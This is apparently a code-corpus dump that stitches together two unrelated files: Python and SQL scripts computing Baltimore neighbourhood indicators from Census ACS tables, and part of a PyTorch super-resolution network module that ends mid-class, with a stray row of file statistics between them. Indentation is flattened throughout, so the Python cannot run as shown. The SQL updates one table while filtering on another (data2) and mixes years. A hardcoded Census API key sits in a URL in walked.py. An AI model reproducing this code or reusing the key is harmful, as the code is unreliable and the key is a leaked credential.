for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav44_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_008E','B08303_009E','B08303_010E','B08303_001E']) )
update vital_signs.data
set trav44_ = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: unempl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe - Population 16 years and over
#Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Percent Population 16-64 Unemployed and Looking for Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def unempl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = [ 'B23001_003E','B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E', 'B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E']
for col in columns:
denominators = addKey(df, denominators, col)
# Zero denominators are dropped in Step 3 before dividing.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force unempl 16-64
# /
# nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <unempl_14> */ --
WITH tbl AS (
select csa,
( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force unempl 16-64
/
nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64
,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY[ 'B23001_003E','B23001_010E','B23001_017E','B23001_024E','B23001_031E','B23001_038E','B23001_045E','B23001_052E','B23001_059E','B23001_066E','B23001_089E','B23001_096E','B23001_103E','B23001_110E','B23001_117E','B23001_124E','B23001_131E','B23001_138E','B23001_145E','B23001_152E','B23001_008E','B23001_015E','B23001_022E','B23001_029E','B23001_036E','B23001_043E','B23001_050E','B23001_057E','B23001_064E','B23001_071E','B23001_094E','B23001_101E','B23001_108E','B23001_115E','B23001_122E','B23001_129E','B23001_136E','B23001_143E','B23001_150E','B23001_157E'])
)
update vital_signs.data
set unempl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: unempr.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe: Population 16 years and over
#Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Unemployment Rate of Population 16-64 Indicator
#input: Year
#output:
import pandas as pd
import glob
def unempr( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = [ 'B23001_006E', 'B23001_013E', 'B23001_020E', 'B23001_027E', 'B23001_034E', 'B23001_041E', 'B23001_048E',
'B23001_055E', 'B23001_062E', 'B23001_069E', 'B23001_092E', 'B23001_099E', 'B23001_106E', 'B23001_113E',
'B23001_120E', 'B23001_127E', 'B23001_134E', 'B23001_141E', 'B23001_148E', 'B23001_155E', 'B23001_008E',
'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E',
'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E',
'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E',
'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E',
'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_006E', 'B23001_013E', 'B23001_020E', 'B23001_027E', 'B23001_034E', 'B23001_041E', 'B23001_048E',
'B23001_055E', 'B23001_062E', 'B23001_069E', 'B23001_092E', 'B23001_099E', 'B23001_106E', 'B23001_113E',
'B23001_120E', 'B23001_127E', 'B23001_134E', 'B23001_141E', 'B23001_148E', 'B23001_155E']
for col in columns:
denominators = addKey(df, denominators, col)
# Zero denominators are dropped in Step 3 before dividing.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( ( value[21]+ value[22]+ value[23]+ value[24]+ value[25]+ value[26]+ value[27]+ value[28]+ value[29]+ value[30]+ value[31]+ value[32]+ value[33]+ value[34]+ value[35]+ value[36]+ value[37]+ value[38]+ value[39]+ value[40]) --civil labor force unemployed 16-64
# /
# nullif( (value[1]+ value[2]+ value[3]+ value[4]+ value[5]+ value[6]+ value[7]+ value[8]+ value[9]+ value[10]+ value[11]+ value[12]+ value[13]+ value[14]+ value[15]+ value[16]+ value[17]+ value[18]+ value[19]+ value[20]) --civil labor force 16-64 ,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force unemployed 16-64
/
nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) --civil labor force 16-64
,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B23001_006E', 'B23001_013E', 'B23001_020E', 'B23001_027E', 'B23001_034E', 'B23001_041E', 'B23001_048E', 'B23001_055E', 'B23001_062E', 'B23001_069E', 'B23001_092E', 'B23001_099E', 'B23001_106E', 'B23001_113E', 'B23001_120E', 'B23001_127E', 'B23001_134E', 'B23001_141E', 'B23001_148E', 'B23001_155E', 'B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E'] )
)
update vital_signs.data
set unempr = result from tbl where data2.csa = tbl.csa and update_data_year = '2013' and data_year = '2014';
"""
# Cell
#export
#File: walked.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 years and over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Walks to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def walked( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_033E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_033E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
# Zero denominators are dropped in Step 3 before dividing.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# value[3] / nullif((value[1]-value[2]),0)
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_010E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi.loc['Baltimore City', 'final'] = float(table.loc[1, table.columns[1]]) # .loc avoids pandas chained-assignment, which may silently write to a copy
return fi['final']
"""
WITH tbl AS (
select csa,
(
value[3]
/ nullif((value[1]-value[2]),0)
)*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08101_001E','B08101_049E','B08101_033E'])
)
update vital_signs.data
set walked = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
""" | 35.086793 | 658 | 0.633281 | 21,200 | 149,575 | 4.361368 | 0.034434 | 0.047501 | 0.027558 | 0.013779 | 0.906901 | 0.894604 | 0.880771 | 0.870118 | 0.864494 | 0.853982 | 0 | 0.109194 | 0.208584 | 149,575 | 4,263 | 659 | 35.086793 | 0.671885 | 0.284192 | 0 | 0.832574 | 1 | 0.003986 | 0.188512 | 0.065345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164009 | false | 0 | 0.055809 | 0.111617 | 0.300114 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
# === superresolution_stage/models/archs/net_utils.py (repo: xian1234/SRBuildSeg, MIT license) ===
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
def init_weights(w, init_type):
if init_type == 'w_init_relu':
nn.init.kaiming_uniform_(w, nonlinearity = 'relu')
elif init_type == 'w_init_leaky':
nn.init.kaiming_uniform_(w, nonlinearity = 'leaky_relu')
elif init_type == 'w_init':
nn.init.uniform_(w)
def activation(activation):
if activation == 'relu':
return nn.ReLU(inplace = True)
elif activation == 'leaky_relu':
return nn.LeakyReLU(negative_slope = 0.1 ,inplace = True )
elif activation == 'selu':
return nn.SELU(inplace = True)
elif activation == 'linear':
return nn.Identity() # identity (no-op); nn.Linear() cannot be constructed without in/out feature sizes
# --------------------FlowNet parts--------------------------------------
# class conv_activation(nn.Module):
# def __init__(self, in_ch, out_ch, kernel_size = 0 , stride = 0, padding = 0, activation = 'relu', init_type = 'w_init_relu'):
# super(conv_activation, self).__init__()
# self.conv = nn.Conv2d(in_ch, out_ch, kernel_size,stride, padding)
# init_weights(self.conv, init_type = init_type)
# self.activation = activation(activation = activation)
# def forward(self, x):
# x1 = self.conv(x)
# x2 = self.activation(x1)
# return x2
# class flow(nn.Module):
# def __init__(self,in_ch, out_ch = 2, kernel_size = 3 , stride = 1, padding = 1, activation = 'linear', init_type = 'w_init' ):
# super(flow, self).__init__()
# self.conv = nn.Conv2d(in_ch, out_ch, kernel_size,stride, padding)
# init_weights(self.conv, init_type = init_type)
# self.activation = activation(activation = activation)
# def forward(self,x):
# x1 = self.conv(x)
# x2 = self.activation(x1)
# return x2
# class leaky_deconv(nn.Module):
# def __init__(self,in_ch, out_ch, deconv = 'default',activation = 'leaky_relu', init_type = 'w_init_leaky' ):
# super(leaky_deconv, self).__init__()
# if deconv == 'default':
# self.up = nn.Upsample(scale_factor = 2, mode = 'bilinear', align_corners = True)
# init_weights(self.up, init_type = init_type)
# self.conv = conv_activation(in_ch, out_ch, kernel_size = 1, stride = 1 ,padding = 0, activation = activation,init_type = init_type)
# else:
# #TODO
# print 'deconv type errors'
# sys.exit(0)
# def forward(self,x):
# x1 = self.up(x)
# x2 = self.conv(x1)
# return x2
# class upsample(nn.Module):
# def __init__(self,in_ch, out_ch, deconv = 'default',activation = 'linear', init_type = 'w_init' ):
# super(upsample, self).__init__()
# if deconv == 'default':
# self.up = nn.Upsample(scale_factor = 2, mode = 'bilinear', align_corners = True)
# init_weights(self.up, init_type = init_type)
# self.conv = conv_activation(in_ch, out_ch, kernel_size = 1, stride = 1 ,padding = 0, activation = activation,init_type = init_type)
# else:
# #TODO
# print 'deconv type errors'
# sys.exit(0)
# def forward(self,x):
# x1 = self.up(x)
# x2 = self.conv(x1)
# return x2
# ---------------------------------functions------------------------------------
def conv_activation(in_ch, out_ch , kernel_size = 3, stride = 1, padding = 1, activation = 'relu', init_type = 'w_init_relu'):
if activation == 'relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.ReLU(inplace = True))
elif activation == 'leaky_relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.LeakyReLU(negative_slope = 0.1 ,inplace = True ))
elif activation == 'selu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.SELU(inplace = True))
elif activation == 'linear':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding))
def flow(in_ch, out_ch , kernel_size = 3, stride = 1, padding = 1, activation = 'linear' , init_type = 'w_init'):
if activation == 'relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.ReLU(inplace = True))
elif activation == 'leaky_relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.LeakyReLU(negative_slope = 0.1 ,inplace = True ))
elif activation == 'selu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.SELU(inplace = True))
elif activation == 'linear':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding))
def upsample(in_ch, out_ch):
return nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True)
def leaky_deconv(in_ch, out_ch):
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.LeakyReLU(0.1,inplace=True)
)
def deconv_activation(in_ch, out_ch ,activation = 'relu' ):
if activation == 'relu':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.ReLU(inplace = True))
elif activation == 'leaky_relu':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.LeakyReLU(negative_slope = 0.1 ,inplace = True ))
elif activation == 'selu':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.SELU(inplace = True))
elif activation == 'linear':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True))
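`upsample`, `leaky_deconv`, and `deconv_activation` all build a `ConvTranspose2d` with `kernel_size=4, stride=2, padding=1`, a common choice because it exactly doubles spatial size. The transposed-convolution output formula makes this concrete; the check below is pure arithmetic, so no torch is needed:

```python
def deconv_out(h_in, kernel=4, stride=2, padding=1, output_padding=0):
    # PyTorch's ConvTranspose2d output-size formula (dilation=1):
    # H_out = (H_in - 1)*stride - 2*padding + kernel + output_padding
    return (h_in - 1) * stride - 2 * padding + kernel + output_padding

# kernel=4, stride=2, padding=1 doubles any input size:
for h in (7, 32, 45):
    print(h, '->', deconv_out(h))
```

Substituting the values, `(H-1)*2 - 2 + 4 = 2H`, which is why these decoders can rely on deconv outputs aligning with skip connections from one encoder level up.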
#-----------------------------UNet----------------------------------
class Encoder(nn.Module):
def __init__(self,in_ch,activation = 'selu', init_type = 'w_init'):
super(Encoder, self).__init__()
self.layer_f = conv_activation(in_ch, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv1 = conv_activation(64, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv2 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv3 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv4 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
def forward(self,x):
layer_f = self.layer_f(x)
conv1 = self.conv1(layer_f)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
conv4 = self.conv4(conv3)
return conv1,conv2,conv3,conv4
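`Encoder` stacks three stride-2, kernel-5, padding-2 convolutions, so `conv2`, `conv3`, and `conv4` sit at roughly 1/2, 1/4, and 1/8 of the input resolution. The standard convolution output formula shows each stride-2 layer yields `ceil(H/2)`; pure arithmetic again, no torch required:

```python
def conv_out(h_in, kernel=5, stride=2, padding=2):
    # PyTorch Conv2d output-size formula (dilation=1):
    # H_out = floor((H_in + 2*padding - kernel) / stride) + 1
    return (h_in + 2 * padding - kernel) // stride + 1

# Trace the three stride-2 stages of Encoder for a hypothetical 96-px input.
h = 96
for name in ('conv2', 'conv3', 'conv4'):
    h = conv_out(h)
    print(name, h)
```

With `kernel=5, padding=2` the kernel is "same"-padded, so the only size change comes from the stride; the stride-1 layers (`layer_f`, `conv1`) preserve resolution.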
class Encoder_2(nn.Module):
def __init__(self,in_ch,activation = 'selu', init_type = 'w_init'):
super(Encoder_2, self).__init__()
self.layer_f = conv_activation(in_ch, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv1 = conv_activation(64, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv2 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv3 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
def forward(self,x):
layer_f = self.layer_f(x)
conv1 = self.conv1(layer_f)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
return conv1,conv2,conv3
class Encoder_3(nn.Module):
def __init__(self,in_ch,activation = 'selu', init_type = 'w_init'):
super(Encoder_3, self).__init__()
self.layer_f = conv_activation(in_ch, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv1 = conv_activation(64, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv2 = conv_activation(64, 128 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv3 = conv_activation(128, 256 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
def forward(self,x):
layer_f = self.layer_f(x)
conv1 = self.conv1(layer_f)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
return conv1,conv2,conv3
class UNet_decoder(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init'):
super(UNet_decoder, self).__init__()
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(192 , 64,activation = activation)
#in_ch
self.warp_deconv2 = deconv_activation(192, 64,activation = activation)
self.post_fusion1 = conv_activation(192, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
warp_deconv4 = self.warp_deconv4(concat0)
concat1 = torch.cat((warp_deconv4,LR_conv3,warp_conv3),1)
warp_deconv3 = self.warp_deconv3(concat1)
concat2 = torch.cat((warp_deconv3,LR_conv2,warp_conv2),1)
warp_deconv2 = self.warp_deconv2(concat2)
concat3 = torch.cat((warp_deconv2,LR_conv1,warp_conv1),1)
post_fusion1 = self.post_fusion1(concat3)
final = self.final(post_fusion1)
return final
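The decoder's in-channel counts follow directly from the concatenations in `forward()`: `torch.cat` along dim 1 adds channel counts, so joining two 64-channel maps gives 128 and joining a deconv output with two skips gives 192. A quick bookkeeping check (assuming every encoder stage emits 64 channels, as in `Encoder` above):

```python
FEAT = 64  # channels emitted by each Encoder stage

# torch.cat along dim=1 sums channel counts:
cat0 = FEAT + FEAT          # (LR_conv4, warp_conv4)      -> warp_deconv4 in_ch
cat1 = FEAT + FEAT + FEAT   # (deconv out, LR_conv3, warp_conv3) -> warp_deconv3 in_ch
print(cat0, cat1)
```

These totals match the constructor arguments `deconv_activation(128, 64)` and `deconv_activation(192, 64)`; a mismatch here is the usual cause of runtime shape errors in U-Net-style decoders.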
class UNet_decoder_2(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init'):
super(UNet_decoder_2, self).__init__()
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(192 , 64,activation = activation)
#in_ch
self.warp_deconv2 = deconv_activation(192, 64,activation = activation)
self.post_fusion1 = conv_activation(192, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.post_fusion2 = conv_activation(64, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
warp_deconv4 = self.warp_deconv4(concat0)
concat1 = torch.cat((warp_deconv4,LR_conv3,warp_conv3),1)
warp_deconv3 = self.warp_deconv3(concat1)
concat2 = torch.cat((warp_deconv3,LR_conv2,warp_conv2),1)
warp_deconv2 = self.warp_deconv2(concat2)
concat3 = torch.cat((warp_deconv2,LR_conv1,warp_conv1),1)
post_fusion1 = self.post_fusion1(concat3)
post_fusion2 = self.post_fusion2(post_fusion1)
final = self.final(post_fusion2) # was post_fusion1; post_fusion2 was computed but never used
return final
class ResBlock(nn.Module):
"""
Basic residual block for SRNTT.
Parameters
---
n_filters : int, optional
a number of filters.
"""
def __init__(self, n_filters=64):
super(ResBlock, self).__init__()
self.body = nn.Sequential(
nn.Conv2d(n_filters, n_filters, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(n_filters, n_filters, 3, 1, 1),
)
def forward(self, x):
return self.body(x) + x
class UNet_decoder_textrans(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init', n_blocks=1):
super(UNet_decoder_textrans, self).__init__()
self.head_deconv4 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv4 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.warp_deconv4 = deconv_activation(64, 64,activation = activation)
self.head_deconv3 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv3 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(64, 64,activation = activation)
self.head_deconv2 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv2 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
#in_ch
